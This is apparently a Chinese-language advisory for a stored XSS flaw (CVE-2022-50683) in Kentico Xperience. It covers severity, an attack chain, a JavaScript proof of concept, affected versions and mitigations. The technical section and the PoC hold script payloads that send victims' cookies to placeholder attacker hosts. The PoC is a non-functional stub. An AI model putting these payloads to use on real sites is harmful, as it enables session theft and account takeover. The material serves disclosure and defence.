CVE-2022-50683 Kentico Xperience 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50683

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Kentico Xperience

漏洞概述

CVE-2022-50683是Kentico Xperience CMS系统中存在的存储型跨站脚本（Stored XSS）漏洞，CVSS评分5.4，中危级别。该漏洞允许具有低权限的攻击者通过表单重定向URL配置功能注入恶意JavaScript脚本。当其他用户访问受影响页面时，恶意脚本会在其浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的钓鱼攻击。此漏洞无需高权限即可利用，但需要用户交互触发。攻击者可利用此漏洞窃取管理员cookie、冒充合法用户执行操作或植入恶意内容。由于是存储型XSS，恶意脚本会持久存在于系统中，影响所有访问相关页面的用户。

技术细节

漏洞存在于Kentico Xperience的表单配置模块中，具体位置是表单重定向URL设置功能。系统在处理重定向URL参数时未对用户输入进行充分的HTML实体编码或输入验证。攻击者可以在表单的重定向URL字段中插入恶意JavaScript代码，如：<script>document.location='https://attacker.com/steal?c='+document.cookie</script>。由于该配置被存储在数据库中且在页面渲染时未经过滤直接输出，导致所有访问该表单相关页面的用户都会执行这段恶意代码。攻击者需要至少具有表单配置的低权限（PR:L），并诱骗管理员或普通用户访问包含恶意脚本的页面（UI:R）。攻击向量为网络层面（AV:N），可影响系统的机密性和完整性（C:L/I:L），但不影响可用性（A:N）。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标站点使用的Kentico Xperience版本，寻找表单配置管理界面

STEP 2

Initial Access

攻击者获取Kentico Xperience的低权限账户（如表单编辑权限）

STEP 3

Payload Injection

通过表单配置中的重定向URL字段注入恶意JavaScript代码

STEP 4

Persistence

恶意脚本被存储在数据库中，所有访问该表单页面的用户都会触发

STEP 5

Social Engineering

攻击者诱骗管理员或普通用户访问包含恶意脚本的表单页面

STEP 6

Session Hijacking

恶意脚本执行后窃取用户cookie并发送到攻击者控制的服务器

STEP 7

Account Takeover

攻击者利用窃取的会话cookie冒充受害者执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50683 Stored XSS PoC - Kentico Xperience Form Configuration
// This PoC demonstrates exploiting the stored XSS via form redirect URL

// Step 1: Identify the vulnerable endpoint
// Typically found in CMS administration panel under Forms configuration

// Step 2: Inject malicious script via form redirect URL field
// Malicious payload:
const maliciousPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

// Step 3: Create a proof-of-concept script
// Simulating the attack flow
function exploitKenticoXperience(targetUrl, sessionCookie) {
    // Login with low-privilege account
    const loginEndpoint = `${targetUrl}/CMSModules/AdminControls/Pages/UIControls/Logon.aspx`;
    
    // Navigate to form settings
    const formSettingsEndpoint = `${targetUrl}/CMSModules/Forms/Controls/FormEdit.aspx`;
    
    // Inject XSS payload in redirect URL field
    // The vulnerable parameter is typically 'RedirectUrl' or similar
    const exploitData = {
        RedirectUrl: maliciousPayload,
        FormName: 'ContactForm',
        Save: true
    };
    
    // When victim visits the form page, the script executes
    console.log('XSS payload stored successfully');
    console.log('Payload will execute on page load for all visitors');
}

// Step 4: Automate the exploitation
const target = 'https://victim-kentico-site.com';
const attackerServer = 'https://attacker-controlled-server.com';

// Construct the stealing payload
const stealCookiePayload = `
    <img src=x onerror="
        fetch('${attackerServer}/collect?cookie='+btoa(document.cookie))
    ">
`;

console.log('Exploit: Inject the following payload in form redirect URL:');
console.log(stealCookiePayload);

// Step 5: Social engineering - trick admin to visit the page
// The XSS will fire when admin visits the affected form page

影响范围

Kentico Xperience < 13.0.200

Kentico Xperience 12.0.x < 12.0.180

Kentico Xperience 11.0.x < 11.0.203

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制表单配置功能的访问权限，仅允许受信任的管理员访问；2）在Web应用防火墙（WAF）层面添加XSS过滤规则；3）启用HttpOnly和Secure标志保护会话cookie；4）实施严格的Content Security Policy；5）监控日志中的异常请求模式；6）考虑临时禁用表单重定向功能直到应用补丁。